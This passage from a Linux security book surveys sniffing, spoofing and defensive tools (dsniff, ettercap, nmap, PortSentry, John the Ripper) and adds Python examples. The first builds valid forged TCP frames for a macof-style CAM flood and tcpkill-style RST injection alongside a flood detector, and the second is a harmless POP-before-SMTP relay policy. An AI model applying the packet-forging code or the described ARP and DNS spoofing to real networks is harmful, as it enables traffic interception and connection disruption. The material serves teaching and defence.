Hacker Linux Uncovered
- hunt ( lin.fsid.cvut.cz/~kra/index.html ) This is one of the popular sniffer programs. Besides capturing traffic, it has built-in functions for sending forged ARP replies (so that hosts deliver their traffic to a MAC address of the attacker's choosing) and for hijacking established connections.
- dsniff ( monkey.org/~dugsong/dsniff/ ) This is a package of utilities for traffic monitoring and related tasks. It comprises the following utilities:
  - dsniff Intercepts passwords (the main utility). It monitors the network for authentication packets; when it sees one, it extracts and displays the password. Authentication exchanges of all the main protocols (Telnet, FTP, POP, etc.) are supported.
  - arpspoof Sends forged ARP replies so that traffic addressed to a chosen IP address (typically the gateway) is delivered to the attacker's MAC address instead of the real owner's.
  - dnsspoof Sends forged DNS replies. When the target machine asks to resolve a host name to an IP address, you answer before the real DNS server does and make the target connect to your computer instead of the requested host.
  - filesnarf Monitors traffic for NFS file transfers and saves the files it sees.
  - mailsnarf Monitors traffic for mail messages carried over POP and SMTP.
  - msgsnarf Monitors Internet pager and chat messages, such as ICQ and IRC.
  - macof Floods a switch with frames carrying random source MAC addresses. When the switch's MAC address table (the CAM table) fills up, many switches fall back to behaving like a simple hub, replicating incoming traffic to all ports, so a sniffer on any port sees everything again.
  - tcpkill Terminates a third-party TCP connection by sending forged RST packets to its endpoints.
  - webspy Monitors Web connections and builds a list of the sites visited by a specific user.
  - webmitm Emulates a Web server to carry out a man-in-the-middle attack (see Section 7.9).
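The two dsniff tools above that forge packets, macof and tcpkill, share the same groundwork: a valid Ethernet/IPv4/TCP frame with correct checksums. The following added example (it is not dsniff's code) builds such frames, produces a macof-style burst of random-source-MAC SYNs, answers a sniffed segment with tcpkill-style RSTs, and, for the defender, counts distinct source MACs in a capture as a CAM-flood check. The MAC and IP addresses, the sniffed segment, the burst size and the alert threshold are all constructed for the example; the RST logic is modelled on tcpkill's approach (RST spoofed from the segment's destination, sequence number taken from the sender's ACK and stepped by the window), not copied from it.

```python
"""Added example, not dsniff's own code: build the frames that macof and tcpkill
send (Ethernet/IPv4/TCP with valid checksums) and run a CAM-table-flood check
over the macof frames. Standard library only; all addresses are constructed."""
import random
import struct

ETH_IP, PROTO_TCP = 0x0800, 6
TH_SYN, TH_RST = 0x02, 0x04


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words. Over data that already
    carries a correct checksum it returns 0, which is how receivers verify."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ipv4_header(src_ip: bytes, dst_ip: bytes, payload_len: int) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64,
                      PROTO_TCP, 0, src_ip, dst_ip)
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def tcp_header(src_ip, dst_ip, sport, dport, seq, ack, flags, win=0) -> bytes:
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, win, 0, 0)
    pseudo = src_ip + dst_ip + struct.pack("!BBH", 0, PROTO_TCP, len(hdr))  # pseudo-header
    return hdr[:16] + struct.pack("!H", checksum(pseudo + hdr)) + hdr[18:]


def frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, seq, ack, flags, win=0):
    """A 54-byte Ethernet/IPv4/TCP frame with no options and no payload."""
    tcp = tcp_header(src_ip, dst_ip, sport, dport, seq, ack, flags, win)
    return (dst_mac + src_mac + struct.pack("!H", ETH_IP)
            + ipv4_header(src_ip, dst_ip, len(tcp)) + tcp)


def parse(fr: bytes) -> dict:
    """Decode the fields the tools need from a frame laid out as frame() builds it."""
    sport, dport, seq, ack, _, flags, win = struct.unpack("!HHIIBBH", fr[34:50])
    return dict(dst_mac=fr[:6], src_mac=fr[6:12], src_ip=fr[26:30], dst_ip=fr[30:34],
                sport=sport, dport=dport, seq=seq, ack=ack, flags=flags, win=win)


def checksums_ok(fr: bytes) -> bool:
    """What a receiving host checks before it acts on the segment at all."""
    pseudo = fr[26:34] + struct.pack("!BBH", 0, PROTO_TCP, len(fr) - 34)
    return checksum(fr[14:34]) == 0 and checksum(pseudo + fr[34:]) == 0


def macof_burst(count: int, seed: int = 0) -> list:
    """macof's output: each frame has fresh random MACs and IPs and is a TCP SYN
    to a random port. Every new source MAC costs the switch one CAM-table entry."""
    rng = random.Random(seed)
    rb = lambda n: bytes(rng.getrandbits(8) for _ in range(n))
    return [frame(rb(6), rb(6), rb(4), rb(4), rng.randrange(1024, 65536),
                  rng.randrange(1, 65536), rng.getrandbits(32), 0, TH_SYN, 512)
            for _ in range(count)]


def distinct_source_macs(frames: list) -> int:
    """Detection side: on a normal segment this stays in the dozens; under macof
    it grows by one per frame. Alert when it passes a per-window threshold."""
    return len({fr[6:12] for fr in frames})


def tcpkill_rsts(observed: bytes, severity: int = 3) -> list:
    """Modelled on tcpkill: answer a sniffed segment with RSTs spoofed from its
    destination back to its sender. seq = the sender's ACK, i.e. the next byte it
    expects from its peer; later RSTs step by the window so one is still
    in-window if the connection advanced after the capture."""
    p = parse(observed)
    return [frame(p["dst_mac"], p["src_mac"], p["dst_ip"], p["src_ip"],
                  p["dport"], p["sport"], (p["ack"] + i * p["win"]) & 0xFFFFFFFF,
                  0, TH_RST) for i in range(severity)]


if __name__ == "__main__":
    a_mac, b_mac = bytes.fromhex("001122334455"), bytes.fromhex("0011223344aa")
    a_ip, b_ip = bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])
    seen = frame(a_mac, b_mac, a_ip, b_ip, 40000, 80, 1000, 5000, 0x18, 65535)
    for rst in tcpkill_rsts(seen):
        print("RST seq", parse(rst)["seq"], "checksums ok:", checksums_ok(rst))
    print("distinct source MACs in 500 macof frames:", distinct_source_macs(macof_burst(500)))
```

Two practical points the code makes visible: a switch that "fails open" does so only because the CAM table is a finite resource, so per-port MAC limits (port security) stop macof cold; and tcpkill works only if the forged RST lands inside the victim's receive window, which is why it sends several, stepped by the window size, rather than one.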
- ettercap ( ettercap.sourceforge.net ) In my opinion, this is the most convenient traffic-monitoring program. Its main function is to look for passwords in packets of all popular protocols. Administrators will also appreciate the function to detect other sniffing programs.
- LSAT ( usat.sourceforge.net/ ) This utility checks the system configuration (considered in Section 12.3). It analyzes the server's configuration, reports potential faults, and in some cases recommends how to fix them.
- Bastille ( bastille-linux.sourceforge.net/ ) This utility detects potential server-configuration errors and can correct many of them automatically.
- Klaxon ( www.eng.auburn.edu/users/doug/second.html ) This is an attack-detection utility (see Section 12.4).
- PortSentry ( sourceforge.net/projects/sentrytools ) This utility watches for port-scanning activity (see Section 12.4). It can automatically reconfigure the firewall to block all connections from the computer the port scan came from.
- Swatch ( sourceforge.net/projects/swatch ) This is a handy program for analyzing system logs on a schedule (see Section 12.6).
- Logsurfer ( sourceforge.net/projects/logsurfer ) This is one of the few utilities that can analyze security logs dynamically (see Section 12.6).
- John the Ripper ( www.openwall.com/john/ ) This is the most famous password-cracking program.
- POP-before-SMTP ( popbsmtp.sourceforge.net/ ) This service allows a client to relay mail through the server only if it has recently authenticated to its POP3 mailbox from the same IP address; the permission expires after a short grace period.
- nmap ( www.insecure.org/nmap/ ) This is a port scanner with numerous features.
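The POP-before-SMTP rule in the list above is simple enough to show end to end. The following added example (it is not the popbsmtp project's code) implements the relay policy: it reads successful POP3 logins from mail-log lines, opens relaying for the client's IP address for a grace period, answers the MTA's "may this client relay now?" question, and sweeps expired entries. The log lines, their format (a Courier-style `pop3d: LOGIN, user=..., ip=[...]` line), the log year, the 30-minute grace period and the timestamps are all constructed for the example; the real daemon reads several server formats and writes its decisions into the MTA's access database rather than answering in-process.

```python
"""Added example, not the popbsmtp project's code: the POP-before-SMTP relay
rule as a small policy engine. It watches for successful POP3 logins in the
mail log, opens relaying for the client IP for a grace period, and closes it
again afterwards. Log lines and timestamps are constructed for the example."""
import re
from datetime import datetime, timedelta

# Constructed syslog-style lines in the shape a Courier-style pop3d writes; the
# real daemon recognises several server formats, this example only this one.
SAMPLE_LOG = """\
Mar  3 10:15:02 mail pop3d: LOGIN, user=alice, ip=[203.0.113.7]
Mar  3 10:15:40 mail pop3d: LOGIN FAILED, user=bob, ip=[198.51.100.9]
Mar  3 10:16:11 mail pop3d: LOGIN, user=carol, ip=[192.0.2.25]
"""
LOGIN_RE = re.compile(
    r"^(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ pop3d: LOGIN, user=(\S+), ip=\[([\d.]+)\]$")
LOG_YEAR = 2004  # syslog timestamps carry no year; assumed for the example


def parse_ts(stamp: str) -> datetime:
    """'Mar  3 10:15:02' -> datetime (strptime tolerates the padding space)."""
    return datetime.strptime(f"{LOG_YEAR} {stamp}", "%Y %b %d %H:%M:%S")


class RelayPolicy:
    def __init__(self, grace: timedelta = timedelta(minutes=30)):
        self.grace = grace
        self.expires = {}  # client IP -> moment relaying closes again

    def feed(self, line: str):
        """Consume one log line; return the IP if it was a successful login."""
        m = LOGIN_RE.match(line)
        if not m:
            return None  # failed logins and unrelated lines open nothing
        ip = m.group(3)
        # A fresh login extends the window; it never shortens it.
        self.expires[ip] = parse_ts(m.group(1)) + self.grace
        return ip

    def relay_allowed(self, ip: str, now: str) -> bool:
        """The MTA's question at RCPT time: may this client relay right now?
        The decision is per IP, not per user, so everyone behind the same NAT
        as an authenticated user inherits the window. That is the scheme's
        well-known weakness, and the reason SMTP AUTH is preferred today."""
        return parse_ts(now) < self.expires.get(ip, datetime.min)

    def sweep(self, now: str) -> list:
        """Periodic cleanup, as when the daemon rewrites the MTA's access map;
        returns the IPs still allowed to relay afterwards."""
        t = parse_ts(now)
        self.expires = {ip: exp for ip, exp in self.expires.items() if exp > t}
        return sorted(self.expires)


if __name__ == "__main__":
    policy = RelayPolicy()
    for line in SAMPLE_LOG.splitlines():
        policy.feed(line)
    for ip in ("203.0.113.7", "198.51.100.9"):
        print(ip, "may relay at 10:20:", policy.relay_allowed(ip, "Mar  3 10:20:00"))
    print("still open at 10:46:", policy.sweep("Mar  3 10:46:00"))
```

The grace period is the whole security argument: too short and roaming users get "relaying denied" between checking mail and sending, too long and a shared or NAT'd address stays open for anyone behind it, so the sweep must run often and the window must be kept small.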